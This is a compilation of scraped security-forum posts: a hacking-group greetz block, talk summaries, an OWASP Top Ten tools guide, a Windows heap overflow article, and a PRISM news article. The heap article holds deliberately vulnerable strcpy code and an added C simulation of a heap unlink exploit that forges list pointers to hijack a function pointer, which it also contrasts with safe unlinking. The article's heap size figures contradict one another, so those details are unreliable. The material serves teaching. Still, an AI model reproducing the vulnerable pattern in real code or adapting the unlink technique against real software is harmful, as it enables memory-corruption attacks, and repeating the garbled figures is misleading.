     Greetz to: H4x0rL1f3 | KhantastiC HaXor | H4x0r HuSsY | b0x | Invectus | Shadow008 | Neo HaXor | Hitcher | Dr.Z0mbie | Hmei7 | phpBugz | MindCracker | c0rrupt | r00x | Pain006 | Ment@l Mind | M4DSh4k | H1d@lG0 | AlphaSky | 3thicaln00b | e0fx | madc0de | makman | DeaTh AnGeL | Lnxr00t | x3o-1337 | Tor Demon | T4p10N | AL.MaX HaCkEr | ThaRude | ThaDark | Evil-DZ | H3ll-dz | Over-X | 3xp1r3 Cyber Army | Pakistan Cyber Army And All MaDLeeTs TeaM Members
     ###########################################################################
     http://www.MaDLeeTs.com
     ###########################################################################

     Source: WHMCS Cross Site Request Forgery ≈ Packet Storm
  8. Encryption At The Software Level: Linux And Windows

     Description: In this video Mark Stanislav from Due Security discusses encryption for Linux, and Farooq Ahmed, Development Manager of Online Tech, discusses encryption for Windows.

     Encryption: changing plain text into cipher text in order to make the original data unreadable to anyone not possessing knowledge of the decryption algorithm and any required key.

     For more information please visit: Compliant Cloud | Colocation | Managed Servers | Disaster Recovery

     Source: Encryption At The Software Level: Linux And Windows
  9. Ssl Traffic Analysis Attacks - Vincent Berg

     Description: The talk will focus on modern SSL traffic analysis attacks. Although it has been known and great papers have been published about it, most people still are not aware of the lengths an attacker can go to in order to extract useful information from the SSL sessions. By showing some large targets and some useful progress in that space it is hoped that the audience will gain a better understanding of what SSL traffic analysis is, that it is a real threat (depending on the skills of the assumed adversary), and some knowledge on how to try and avoid these types of attacks. There will be a bunch of research tools accompanying the talk with at least one being a proof of concept on how to do traffic analysis on Google Maps.

     For more information, please visit: Breakpoint 2012 Speakers List

     Source: Ssl Traffic Analysis Attacks - Vincent Berg
  10. [h=1]OWASP Top Ten Testing and Tools for 2013[/h]Jonathan Lampe June 27, 2013 In 2013 OWASP completed its most recent regular three-year revision of the OWASP Top 10 Web Application Security Risks. The Top Ten list has been an important contributor to secure application development since 2004, and was further enshrined after it was included by reference in the Payment Card Industry Security Standards Council’s Data Security Standard, better known as PCI-DSS. Surprisingly, there were only a few changes between the 2010 Top Ten and 2013 Top Ten lists: one addition, several reorders and some renaming. The most prevalent theme was probably that both cross-site scripting (XSS) and cross-site request forgery (CSRF) dropped in importance: XSS apparently because safer scripting libraries are becoming more widespread, and CSRF because these vulnerabilities are not as common as once thought. In any case, the current entries in the OWASP Top Ten Web Application Security Risks for 2013 are:
A1: Injection. Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.
A2: Broken Authentication and Session Management. Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys or session tokens, or to exploit other implementation flaws to assume other users’ identities.
A3: Cross-Site Scripting (XSS). XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser, which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
A4: Insecure Direct Object References. A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.
A5: Security Misconfiguration. Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server and platform. All these settings should be defined, implemented and maintained, as many are not shipped with secure defaults. This includes keeping all software up to date.
A6: Sensitive Data Exposure. Many web applications do not properly protect sensitive data, such as credit cards, SSNs, tax IDs and authentication credentials. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud or other crimes. Sensitive data deserves extra protection such as encryption at rest or encryption in transit, as well as special precautions when exchanged with the browser.
A7: Missing Function Level Access Control. Virtually all web applications verify function level access rights before making that functionality visible in the UI. However, applications need to perform the same access control checks on the server when each function is accessed. If requests are not verified, attackers will be able to forge requests in order to access unauthorized functionality.
A8: Cross-Site Request Forgery (CSRF). A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the victim’s session cookie and any other automatically included authentication information, to a vulnerable web application. This allows the attacker to force the victim’s browser to generate requests the vulnerable application thinks are legitimate requests from the victim.
A9: Using Components with Known Vulnerabilities. Vulnerable components, such as libraries, frameworks, and other software modules, almost always run with full privilege. So, if exploited, they can cause serious data loss or server takeover. Applications using these vulnerable components may undermine their defenses and enable a range of possible attacks and impacts.
A10: Unvalidated Redirects and Forwards. Web applications frequently redirect and forward users to other pages and websites, and use untrusted data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.
This is the fourth edition of a list that comes out every three years, and with the limited changes between 2010 and 2013 it is fair to say that OWASP’s popular Top Ten list has matured. With maturity and popularity, automation and utilities that directly address the items on the list have arrived, and some of the best are summarized in the chart below.
WEB APPLICATION RISK | SECURITY UTILITY
A1: Injection | SQL Inject Me and Zed Attack Proxy (ZAP)
A2: Broken Authentication and Session Management | ZAP
A3: Cross-Site Scripting (XSS) | ZAP
A4: Insecure Direct Object References | HTTP Directory Traversal Scanner, Burp Suite and ZAP
A5: Security Misconfiguration | OpenVAS and WATOBO
A6: Sensitive Data Exposure | Qualys SSL Server Test
A7: Missing Function Level Access Control | OpenVAS
A8: Cross-Site Request Forgery (CSRF) | Tamper Data (Samurai WTF), WebScarab or ZAP
A9: Using Components with Known Vulnerabilities | OpenVAS
A10: Unvalidated Redirects and Forwards | ZAP
Those of you who read Russ McRee’s 2010 Top Ten security tools article will notice that most of the tools listed here were also identified in his 2010 survey. However, my approach differs from McRee’s in terms of breadth; whereas McRee aimed to provide a different tool for each of the top ten items, I aim to provide you with a smaller number of tools that should cover most of the top ten so you can concentrate your efforts on mastering fewer tools that do more. Along those lines, it is worth noting that several of my recommended tools, notably the Zed Attack Proxy (ZAP) and new entrant OpenVAS, have increased the breadth of their services to cover more Top Ten items since their original release. In fact, it may be worth taking a closer look at the additional capabilities of any recommended tool on this list because many of these tools are still under active development. (For example, WATOBO now has a SQL injection probe, although I haven’t explored it far enough to recommend it yet.)
[h=1]Two Main Types of Web Vulnerability Tools[/h] If you scan the chart you will notice that two tools are mentioned the most: OWASP’s Zed Attack Proxy (ZAP) and OpenVAS. These two tools represent two different classes of application scanning that every security researcher should familiarize himself or herself with. First, there are the tools that look for common misconfigurations and outdated software, including default settings, sample content, insecure configurations, and old versions that harbor known vulnerabilities. These tools are represented in the chart above by OpenVAS, an open source project with several heavyweight sponsors including the government of Germany. Similar tools include Tenable’s Nessus and eEye Digital Security’s Retina, and perhaps about two dozen more actively developed open source projects and commercial products. Second, there are the tools that help dig into specific web applications by automating SQL injection, authentication, session, XSS, directory traversal, redirect and other probes for common and serious vulnerabilities. These tools are represented in the chart above by ZAP. Most of these tools, including ZAP, use a combination of a local web proxy, web session recorder, web playback and thousands of variations on input manipulation to look for vulnerabilities. Similar tools include HP WebInspect, IBM AppScan (originally by WatchFire), dozens of other general-purpose web vulnerability scanners and hundreds of special-case utilities. [h=1]Other Web Vulnerability Tools[/h] In addition to these two main types of tools, most security practitioners will find themselves drawn to additional tools that allow them to dig further into certain classes of vulnerabilities. For example, the “other tools” in my list were selected to cover areas where I worried about the thoroughness of my main tools, or where I wanted a second pair of eyes because of the risk.
Your list of “other tools” will vary depending on the specific capabilities of your main tools, the needs of your clients or employer, your available operating systems and many other factors, but I selected mine for a few specific reasons.
SQL Inject Me for #1 Injection – Although ZAP covers this, I selected a second tool to give me a second pair of eyes on this most common and deadly of vulnerabilities. (I never want to be caught with my pants down on OWASP’s #1 vulnerability.)
HTTP Directory Traversal Scanner and Burp Suite for #4 Insecure Direct Object References – Although ZAP also covers this item, I like the breadth of scan and the output provided by either of these tools much more than ZAP’s breadth and output.
WATOBO for #5 Security Misconfiguration – This is the highest-rated item that known vulnerability scanners like OpenVAS can detect. I wanted a second pair of eyes to make sure I am detecting more configuration issues, and to get a second opinion on questionable detects.
Qualys SSL Server Test for #6 Sensitive Data Exposure – This could be my most controversial recommendation, but having dealt with the innards of SSL/TLS while developing several security products (including the FIPS 140 validation process with three different companies), I always feel like I have an incomplete picture of my SSL/TLS capabilities until I hit my app with Qualys’s SSL Server Test. None of the other local tests I’ve found (or written on my own) have quite the breadth of this hosted test.
Tamper Data (Samurai WTF) and WebScarab for #8 Cross-Site Request Forgery (CSRF) – CSRF vulnerabilities can be surprisingly hard to pin down, because what often looks like a detect turns out to be a false positive, and what looks like a clean access denial often really changes something interesting on the backend. To chase these vulnerabilities down (to the point where they are reproducible) you usually need to master a local web proxy that can help you manipulate specific fields.
Two of the best are Tamper Data and WebScarab, and you will often find yourself switching to your favorite proxy after your main tool registers an initial detect. (Yes, I know ZAP is also a proxy, but it’s not my favorite proxy; it’s my favorite detector.) One other tool that web security practitioners should be familiar with is OWASP’s WebGoat package. This tool isn’t a scanner, probe or proxy: instead, WebGoat is an intentionally insecure web application that we can probe with these and other web security tools. [h=1]Specific Web Vulnerability Applications (Main Tools)[/h] [h=2]Deep Probe Into Specific Applications: OWASP’s Zed Attack Proxy (ZAP)[/h] (Probes for Cross-Site Scripting, Injection, Sessions, Directory Traversal, Unvalidated Redirects and Forwards, and acts as a web proxy to locate CSRF and similar vulnerabilities.) OWASP has recently sponsored the development of its own web application vulnerability scanner called the Zed Attack Proxy (or ZAP for short). It automatically spiders a target URL and looks for common vulnerabilities, especially issues with cookies, headers and cross-site scripting. [h=3]Installing and Running Zed Attack Proxy[/h]
Download and install the program from http://code.google.com/p/zaproxy/downloads/list
Run the program from your Start menu
When prompted, use the wizard to create an “SSL root certificate”
Type in the URL of a target application in the “URL to attack” field on the “Quick Start” tab
To avoid unwanted attention until you know what you’re doing, please stick to “http://localhost” URLs, such as your local copy of WebGoat
Much of the power of ZAP comes from using it as an “inline” proxy rather than as an interactive application. To try this mode:
Open “Tools | Options | Local proxy” and set the proxy port to an acceptable value (8080 is the default, but if you’re running multiple proxies and web applications on your local machine, things can get a little crowded).
Open your web browser and set its proxy settings to “localhost” and port 8080 (or whatever you configured).
Browse to a few sites in the web browser.
Flip back to ZAP. Notice that the sites you visited (and a few referenced through advertisements and inclusions) are now listed in ZAP’s “Sites” list.
Click the “History” tab in the lower half of ZAP. This will show the URLs that caused content to be added to ZAP’s “Sites” list.
Once you have started to gather URLs in your sites list, you can expand, gather more information about or actively attack them.
In the “Sites” tab, find a URL of a web page that you recognize on a site that you know has more content. Select it and then click the “play” icon on the “Spider” tab at the bottom of the screen to follow the links on the page.
To look for SQL Injection or XSS vulnerabilities in a page, select the URL in the “Sites” tab and right-click it to list “Attack” options.
To set your attack options (e.g. to just check for XSS and avoid SQL injection attacks), select “Analyse | Scan Policy…” to turn various tests on and off.
[h=2]Bad Configuration and Old Software Scanner: OpenVAS[/h] (Probes for Security Misconfiguration, Missing Function Level Access Control, Using Components with Known Vulnerabilities.) I took my original formal security training in the late 1990s, so I “grew up” on Nessus when it was still a free security scanning application. Since its switch to a commercial application, a handful of forks of the original Nessus code have carried on Nessus’s original promise of a free remote security scanner. My favorite alternative to Nessus these days is the OpenVAS project, which counts among its backers the national government of Germany. As noted in my chart above, this project is best at finding security misconfigurations, missing function level access controls (formerly known as “failure to restrict URL access”) and components with known vulnerabilities.
It includes some SQL injection and other probes to test application input, but since it is mainly designed to scan networks for machines with bad configuration and outdated software, I think you should use it the same way. Installing and Running OpenVAS The OpenVAS software is available for several popular Linux distributions including CentOS, Fedora and Red Hat Enterprise Linux. It is also available as virtual appliances for Oracle VirtualBox and EMC VMware. Once installed, a web-based interface is available to guide you through the scanning process. You’ve likely seen the types of reports that this application generates before: rating findings by severity, and ranking multiple machines from least secure to most secure depending on the number and severity of findings on each machine. For more information, please see: http://www.openvas.org/ [h=1]Other Top Ten Web Application Vulnerabilities Utilities[/h] [h=2]Injection Utility: Security Compass’s SQL Inject Me[/h] Even if you have moved to Chrome or Safari for your daily web browsing, it’s hard to give up Firefox entirely because of its extensive library of add-ons. One of the best SQL injection tools available today is a Firefox add-on called “SQL Inject Me” from Security Compass. [h=3]Installing and Running SQL Inject Me[/h]
Install and run the latest version of Firefox (I am currently using v20).
Install the add-on from: https://addons.mozilla.org/En-us/firefox/addon/sql-inject-me/
After installing the SQL Inject Me plug-in, follow these directions to use it:
Navigate to the page or application you want to test.
Right-click on the target page and select “Open SQL Inject Me Sidebar”.
Once the sidebar is open, use the drop-down and buttons to perform specific attacks.
[h=2]Advanced Web Proxy and CSRF Utility: OWASP WebScarab[/h] OWASP’s WebScarab is a Java-based web proxy that displays and allows you to manipulate the specific fields that are passed between browser and server.
It is highly extensible, but you often need to know what you want to chase after and how to code to chase it with this tool. Further muddying this project is the fact that a “next generation” edition was started but has not been touched since 2011. For more information, please see: https://www.owasp.org/index.php/WebScarab_Getting_Started or https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project [h=2]Insecure Direct Object Reference Utility: Burp Suite[/h] Russ McRee’s 2010 security tools article went into detail about how to use the Burp Suite to ferret out path and directory traversal issues. Path and directory traversal issues have been problematic for web servers and web applications since their inception, perhaps most famously in the 2000 IIS vulnerability that fed worms such as Nimda. Rather than repeat McRee’s work with Burp Suite, I will just agree that Burp Suite is good. For more information, please see: http://portswigger.net/burp/ [h=2]Insecure Direct Object Reference Utility: HTTP Directory Traversal Scanner[/h] Another tool that I like for directory traversal issues is the free HTTP Directory Traversal Scanner by John Leitch, an independent application security consultant in Michigan. This tool scans a given URL with about ten thousand URL variants in an attempt to find a named file. It helpfully groups its results by return code and content, which makes it easy to find needles in haystacks. For more information, please see: http://www.autosectools.com/Page/HTTP-Directory-Traversal-Scanner [h=2]Security Misconfiguration Utility: WATOBO[/h] Russ McRee’s 2010 security tools article uses WATOBO to look for security misconfiguration issues, and the tool is still a good choice: it’s open source and maintained by an active community.
For more information, please see: http://sourceforge.net/apps/mediawiki/watobo/index.php?title=Main_Page [h=2]Sensitive Data Exposure Utility: Qualys SSL Server Test[/h] I normally avoid web-based tools for application scanning for several reasons: the data may not just be reported back to me, they might be pulled or changed at any time, and they need to hit an Internet-facing application. However, I recommend Qualys’s SSL Server Test page to test the quality of your web application’s HTTPS connection before and after deployment into production. Qualys tests for basic quality issues such as whether your server supports SSL 2.0, which ciphers are supported, and the strength of your server certificate. It also tests more advanced quality measures such as whether or not client-initiated renegotiation is allowed and whether or not the BEAST attack would be mitigated. For more information, please see: https://www.ssllabs.com/ssltest/index.html (This is a resource hosted by a third party. For maximum protection, only allow traffic from “ssllabs.com” to the target resource until the necessary issues are resolved.) [h=2]CSRF Utility: Tamper Data (Samurai WTF)[/h] A Tamper Data utility is available in the Samurai WTF collection and is part of Russ McRee’s coverage of CSRF utilities in his 2010 security tools review. The “Tamper Data” plug-in for Firefox is not currently recommended because of ongoing stability issues with recent versions of Firefox. Instead, I currently recommend configuring Firefox (or Chrome or any other web browser) to use a web proxy such as WebScarab or ZAP, and then using the functions within the web proxy to manipulate individual cookies, headers, form fields and URLs. [h=2]WebGoat: The Perfect Target[/h] In addition to the top ten web vulnerability list, OWASP develops and distributes software that allows students and security professionals to practice their skills against a deliberately insecure web application.
The name of OWASP’s tilting dummy is “WebGoat,” and it is available in both .NET and Java editions. [h=3]How to Download, Install and Set Up WebGoat on Windows[/h] Although there is a .NET edition of WebGoat available for Windows platforms, I’ll stick with the Java edition in this article because that edition supports Linux and Mac OS platforms in addition to Windows. The Java edition also appears to be the more actively developed application, as its official ambitions include growing into a security benchmarking platform and a honeypot. [h=3]WebGoat Prerequisites[/h] The Java edition of WebGoat requires Java, of course, and uses Tomcat to provide its web interface.
Download and install Oracle Java from http://www.java.com (Java Version 1.6, a.k.a. “Java 6”, is recommended)
Download and install Tomcat from http://tomcat.apache.org/ (Tomcat Version 6 is recommended; Tomcat Version 7 is supported but requires additional setup not documented here)
Once installed, open http://localhost:8080/ to confirm that Tomcat is working
Once you confirm the service is working, stop the Tomcat service
[h=3]How to Install WebGoat[/h]
Download and unzip WebGoat from http://code.google.com/p/webgoat/downloads/list (download the “Zip” file and unpack the contents into a local folder)
Open your local folder and double-click “webgoat.bat”. A Java window labeled “Tomcat” will open and display messages.
Once the “Server startup in XXXXX ms” message appears, open http://localhost to confirm that you are hitting a live Tomcat application on port 80
Next, test WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted.
[h=3]How to Run WebGoat[/h]
Start WebGoat by opening http://localhost/WebGoat/attack. Sign on with username “guest” and password “guest” when prompted.
Click the “Start WebGoat” button.
Sursa: InfoSec Institute Resources – OWASP Top Ten Testing and Tools for 2013
  11. [h=1]Heap Overflow: Vulnerability and Heap Internals Explained[/h]ViperEye June 26, 2013 1. Introduction A heap overflow is a form of buffer overflow; it happens when a chunk of memory is allocated on the heap and data is written to this memory without any bounds checking being done on the data. This can lead to overwriting some critical data structures in the heap such as the heap headers, or any heap-based data such as dynamic object pointers, which in turn can lead to overwriting the virtual function table. Here we’ll see some details about the inner workings of the Windows heap, then move on to discuss how a heap overflow vulnerability occurs. The paper will start with basic information on how Windows heap management is done and then move to understanding the vulnerability. 2. Windows Heap Basics Windows has two kinds of heap: Default heap Dynamic heap The default heap is used by the win32 subsystem to manage and allocate memory for local and global variables and local memory management functions [malloc()]. The dynamic heap is created by functions such as HeapCreate() that return a handle/address to a memory chunk that contains the heap header; the information in this header includes the segment table, virtual allocation list, free list usage bitmap, free list table, lookaside table, etc. This data is used by heap allocation functions such as HeapAlloc() and HeapReAlloc(), which allocate memory from this particular heap. As we can see from the above image, the PEB stores the details of the heaps initialized in the process. This can be useful in enumerating heaps in the process. The above image shows the structure of the heap header. Next we will take a look at some of the important data structures in the heap that will help us understand the heap exploit better.
Heap header (partial layout; other fields omitted):
..
Segment List
..
Virtual Allocation List
..
Free List
..
Pointer to Lookaside List
..
The condition where the heap is not used is when the allocation chunk is greater than 512KB (4096 bytes); in this case, the allocation is done in virtual memory by VirtualAlloc(). Let’s see how this happens: The above image shows how the heap allocation is done; certain constraints are verified before passing it forward. As we can see, all the calculation is done based on dividing by 8, the size of the allocated block is always divisible by 8, and we can also conclude from the code that there cannot exist a block of size 8 bytes because the header itself will amount to 16 bytes. Here’s the decision path during the heap allocation process:
If the block size is greater than 1024 bytes, go to step 2. If it is less than 1024 bytes, check the lookaside list; if there are no free entries, check the free list.
If the above condition is true, then check whether the memory to be allocated is greater than 0xFE00 (512 KB). If the above condition is not true, then the memory is allocated from the free list.
If the above condition is true, then check whether the heap was created with a fixed size; if so, throw an error (STATUS_BUFFER_TOO_SMALL) 0xC0000023. If not, use ntdll.ZwAllocateVirtualMemory to allocate new memory.
Now let’s look at how heap memory is freed; memory is freed based on whether it is in the default heap or the dynamically allocated heap. If the buffer is in the default heap then:
Try to free to the lookaside list.
Or coalesce the buffer and place it on the free list.
If it is virtually allocated:
Remove from the busy list
Or free it to the OS.
Free buffer to lookaside happens only if:
There is a lookaside table
Lookaside is not locked
Requested size is smaller than 1024 (to fit the table)
Lookaside is not “full” yet.
If the buffer can be placed on the lookaside, keep the buffer flags set to busy and return to the caller. The other option is to coalesce and place on the free list. This happens only if the buffer can’t be freed to the lookaside. The conditions where coalesce fails:
Freed buffer flags & 0x80 is true
Freed buffer is first -> no backward coalesce
Freed buffer is last -> no forward coalesce
Adjacent buffer is busy
The total size of two adjacent buffers is bigger than the virtual allocate threshold (0xFE00 * 8 bytes == ~64k)
Insert to free list if:
Coalesced block size < 1024: insert to the proper free list entry.
Coalesced block size > De-commit threshold and total heap free size is over the De-commit total free threshold: de-commit the buffer back to the OS.
Coalesced block is smaller than the virtual allocate threshold: insert the block into free list [0].
Coalesced block is bigger than the virtual allocate threshold: break the buffer into smaller chunks, each one as big as possible, and place them on free list [0].
Heap Overflows
Let’s take a look at this rather simple example of a vulnerable function:

    HANDLE h = HeapCreate(0, 0, 0); // default flags

    DWORD vulner(LPVOID str)
    {
        LPVOID mem = HeapAlloc(h, 0, 128);
        strcpy(mem, str); // no bounds check on str
        return 0;
    }

As we can see, here the vulner() function copies data from a string pointed to by str to an allocated memory block pointed to by mem, without a bounds check. A string larger than 127 bytes passed to it will thereby overwrite the data adjacent to this memory block (which is, actually, the header of the following memory block). The lookaside list has two pointers pointing to the lookaside entries before and after it, called the FLINK and BLINK pointers. The layout for a single lookaside entry is given below: So, when an overflow occurs, we can overwrite the FLINK and BLINK pointers.
Now let’s modify the above code:

    DWORD vulner(LPVOID str)
    {
        HANDLE h = HeapCreate(0, 0, 0);
        LPVOID m1 = HeapAlloc(h, 0, 64);
        LPVOID m2 = HeapAlloc(h, 0, 128);
        HeapFree(h, 0, m1);
        HeapFree(h, 0, m2);
        // The above steps place the buffers in the lookaside list

        m1 = HeapAlloc(h, 0, 64);
        // This sets up the memory for overwrite into the adjacent memory block:
        // 64 bytes of data plus 16 bytes that run into the next chunk's header and links
        memset(m1, 0x31, 64 + 16);
        m2 = HeapAlloc(h, 0, 128 - 8);
        strcpy(m2, str);
        return 0;
    }

From the above code we can see that we have allocated two memory chunks and then freed them to the lookaside list; as mentioned above, any memory below 1024-8 bytes will be sent to the lookaside list. After that, an allocation of 64 bytes is done again. This will move the memory back to the busy list. But, in this case, the memory of 128 bytes will still be right next to the 64-byte chunk, so if we overflow the 64-byte chunk the data will write into the 128-byte chunk. In the next line we are overwriting with 64+16 bytes of data, which will overwrite the header and the FLINK and BLINK pointers of the 128-byte block. This is shown in the image below: The whole process of unlinking is shown below: Entry2->BLINK->FLINK = Entry2->FLINK Entry2->FLINK->BLINK = Entry2->BLINK So now, when the 128-byte buffer is allocated, it has already corrupted FLINK and BLINK pointers. These can be in an attacker’s control. So the entry “Entry2->BLINK->FLINK” will be in an attacker-controlled memory location; this can be overwritten with the value of Entry2->FLINK, which is also attacker-controlled. Conclusion This paper simply gives an understanding of the heap overflow process. The next article will give the details about how this vulnerability can be exploited. Sursa: InfoSec Institute Resources – Heap Overflow: Vulnerability and Heap Internals Explained
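The unlink write-what-where that the article ends on (Entry2->BLINK->FLINK = Entry2->FLINK; Entry2->FLINK->BLINK = Entry2->BLINK) can be exercised without a Windows machine. The following is an added example, not code from the article or from Windows: it is a portable C simulation using a toy free list with the same 8-byte header plus FLINK/BLINK layout, a constructed segment in which a busy 64-byte chunk A is directly followed by free chunk B, a constructed victim (a function pointer) and a writable buffer standing in for shellcode. It runs the overflow against the old unchecked unlink and against the “safe unlinking” check that XP SP2 and later heaps added; the names entry_t, segment_t, victim_t and fake_shellcode are this example’s own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>
#include <stdio.h>

/* Free-list entry with the layout the article describes: an 8-byte chunk
 * header followed by the FLINK/BLINK pair (sizes in 8-byte granules). */
typedef struct entry {
    uint16_t size;          /* chunk size in 8-byte units, header included */
    uint16_t prev_size;
    uint8_t  flags;         /* 0x01 = busy */
    uint8_t  pad[3];
    struct entry *flink;    /* next free entry */
    struct entry *blink;    /* previous free entry */
} entry_t;

/* Constructed heap segment: busy chunk A (64 bytes of user data) immediately
 * followed by free chunk B, the adjacency the article's code sets up. */
typedef struct {
    uint8_t  a_hdr[8];
    uint8_t  a_data[64];
    entry_t  b;             /* B's header and links start right after A's data */
    uint8_t  b_data[128 - 8];
} segment_t;

/* Constructed victim: a function pointer the attacker wants to redirect. */
typedef struct {
    uint8_t   pad[16];
    uintptr_t fn_ptr;
} victim_t;

static segment_t segment;
static entry_t   list_head;             /* sentinel of the free list */
static victim_t  victim;
static uint64_t  fake_shellcode[8];     /* writable "what": stands in for shellcode */

static const uintptr_t ORIGINAL_FN = 0x41414141u;

/* Old-style unlink: trusts the FLINK/BLINK found inside the chunk. */
static void unlink_unsafe(entry_t *e)
{
    e->blink->flink = e->flink;         /* *(BLINK + offsetof(flink)) = FLINK */
    e->flink->blink = e->blink;         /* *(FLINK + offsetof(blink)) = BLINK */
}

/* Safe unlinking: both neighbours must still point back at the entry,
 * which a blind overflow of FLINK/BLINK cannot arrange. */
static int unlink_safe(entry_t *e)
{
    if (e->flink->blink != e || e->blink->flink != e)
        return 0;                       /* corrupted list: refuse the allocation */
    e->blink->flink = e->flink;
    e->flink->blink = e->blink;
    return 1;
}

/* Read the victim through memcpy so the compiler cannot assume the
 * pointer-typed stores in unlink_* left it untouched. */
static uintptr_t read_victim(void)
{
    uintptr_t v;
    memcpy(&v, &victim.fn_ptr, sizeof v);
    return v;
}

/* Reset the segment, link B into the free list and restore the victim. */
static void setup(void)
{
    memset(&segment, 0, sizeof segment);
    memset(fake_shellcode, 0, sizeof fake_shellcode);
    segment.b.size = (8 + 128) / 8;
    list_head.flink = list_head.blink = &segment.b;
    segment.b.flink = segment.b.blink = &list_head;
    victim.fn_ptr = ORIGINAL_FN;
}

/* The overflow: 64 bytes of filler, then a forged header and forged links,
 * copied through A's 64-byte buffer into B (the article's 64+16 write). */
static void overflow_into_b(void)
{
    entry_t fake;
    uint8_t payload[64 + sizeof(entry_t)];

    memset(&fake, 0x31, sizeof fake);
    fake.flink = (entry_t *)fake_shellcode;                        /* what  */
    fake.blink = (entry_t *)((uint8_t *)&victim +
                 offsetof(victim_t, fn_ptr) - offsetof(entry_t, flink)); /* where */

    memset(payload, 0x31, 64);
    memcpy(payload + 64, &fake, sizeof fake);
    /* Writes past a_data into B: this is the missing bounds check. */
    memcpy((uint8_t *)&segment + offsetof(segment_t, a_data), payload, sizeof payload);
}

/* Allocate B after the overflow on a heap without safe unlinking.
 * Returns 1 when the victim now points at the attacker's buffer. */
int exploit_unsafe_heap(void)
{
    setup();
    overflow_into_b();
    unlink_unsafe(&segment.b);          /* HeapAlloc(h, 0, 128-8) takes B off the list */
    return read_victim() == (uintptr_t)fake_shellcode;
}

/* Same overflow against a heap with safe unlinking.
 * Returns 1 when the allocation is refused and the victim is untouched. */
int exploit_safe_heap(void)
{
    setup();
    overflow_into_b();
    int unlinked = unlink_safe(&segment.b);
    return !unlinked && read_victim() == ORIGINAL_FN;
}

int main(void)
{
    printf("unsafe unlink: victim hijacked = %d\n", exploit_unsafe_heap());
    printf("safe unlink:   attack blocked  = %d\n", exploit_safe_heap());
    return 0;
}
```

Note the second store in unlink_unsafe: it writes BLINK into the attacker’s “what” address plus the BLINK offset, which is why real exploits point FLINK at writable memory (and start the shellcode with a short jump over the clobbered bytes) rather than directly at code.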
  12. [h=1]PRISM – Facts, Doubts, Laws and Loopholes[/h]Pierluigi Paganini June 24, 2013 [h=1]Introduction[/h] Edward Snowden is the name of a 29-year-old technical assistant for the Central Intelligence Agency who disclosed the largest surveillance program implemented by the US, known as the PRISM program. For better or for worse, his name is destined to enter into history. The Guardian identified Edward Snowden as a technical assistant who worked for US Intelligence at the National Security Agency for the last four years for various defense contractors. Currently he is an employee of the security defense contractor Booz Allen Hamilton. Snowden decided to reveal his identity because, like other whistleblowers such as Bradley Manning, the US Army soldier who was arrested in May 2010 in Iraq on suspicion of having passed classified material to the website WikiLeaks, he decided to make public an uncomfortable truth. The disclosure started with the publication of the secret court order to Verizon Communications, but it was just the tip of the iceberg. All of the principal US IT companies support the surveillance program PRISM despite their top management denying it. The surveillance architecture monitors every activity on the Internet, and it has been ongoing for many years. Through it the US Government has obtained access to users’ data, and private companies like Microsoft, Google, Facebook and Apple are all involved. Edward Snowden feared that the government would persecute him for disclosing Top Secret documentation on the extensive mass surveillance program PRISM. While I’m writing this, he is in a hotel in Hong Kong, where he flew after the publication of the presentation he prepared during his work in the NSA Office in Hawaii, around three weeks ago. Snowden decided to publish the history and proof of a program that every US citizen imagined but that authorities and private companies always denied.
He left the US citing health reasons and flew to Hong Kong, the Chinese territory known also for its “strong tradition of free speech.” According to the interview released to The Guardian, Edward Snowden is concerned, as he knows very well the power of intelligence agencies and the ramifications of his actions. He has thus barricaded himself in a hotel. “I’ve left the room maybe a total of three times during my entire stay.” “I have no intention of hiding who I am, because I know I have done nothing wrong.” “I could be rendered by the C.I.A., I could have people come after me.” “We’ve got a C.I.A. station just up the road in the consulate here in Hong Kong, and I’m sure,” “that they’re going to be very busy for the next week, and that’s a fear I’ll live under for the rest of my life,” Snowden said. The confirmation of the existence of a PRISM program has shocked public opinion. Associations for the defense of freedom of expression and human rights are concerned about the violation of citizens’ privacy, even if it is for homeland security reasons. The Obama administration is defending the surveillance program, saying it is necessary to prevent terrorist plots, and that the debated data collection has already allowed the prevention of terrorist acts. “Nobody is listening to your telephone calls. That’s not what this program is about.” “In the abstract you can complain about Big Brother and how this is a potential program run amok, but when you actually look at the details, I think we’ve struck the right balance.” “You can’t have 100 percent security and also then have 100 percent privacy and zero inconvenience.” “We’re going to have to make some choices as a society. … There are trade-offs involved.” This is what the President told journalists during a visit to California’s Silicon Valley. Edward Snowden considers himself a patriot, having served his country as a soldier in Iraq and recently working as a contractor for the CIA overseas.
He declared that he had carefully considered his actions and their possible consequences for the population, but nothing could be worse than what he witnessed. He carefully evaluated the documents he disclosed to ensure no people would be harmed and that the public interest would be served. “Anybody in positions of access with the technical capabilities that I had could, you know, suck out secrets to pass them on the open market to Russia.” “I had access to the full rosters of everyone working at the NSA, the entire intelligence community and undercover assets all around the world — the locations of every station we have, what their missions are.” “If I had just wanted to harm the U.S., you could shut down the surveillance system in an afternoon.” President Obama is in the eye of the storm. He was criticized by some members of Congress despite the White House’s revelation that the administration has held at least 13 briefings for Congress on the surveillance program operated by the NSA. [h=1]The Fact – The PRISM Program[/h] The Washington Post and the Guardian were the first newspapers to publish the news of how the US surveillance machine works. The NSA and FBI systematically access user information from the central servers of the leading IT companies. The list revealed, despite the beliefs of many security experts, that the extent of the monitoring network is larger: AOL Apple Dropbox Facebook Google PalTalk Skype Yahoo You Tube The surveillance project began in 2007 and was supported by the Bush administration. It was known as PRISM and is capable of acquiring sensitive information from IT majors and then operating complex analysis activities. The Washington Post published an article on the PRISM program reporting the top secret documents disclosed in Snowden’s presentation. They revealed that PRISM has been referred to at least 1,477 times during government briefings on Homeland Security.
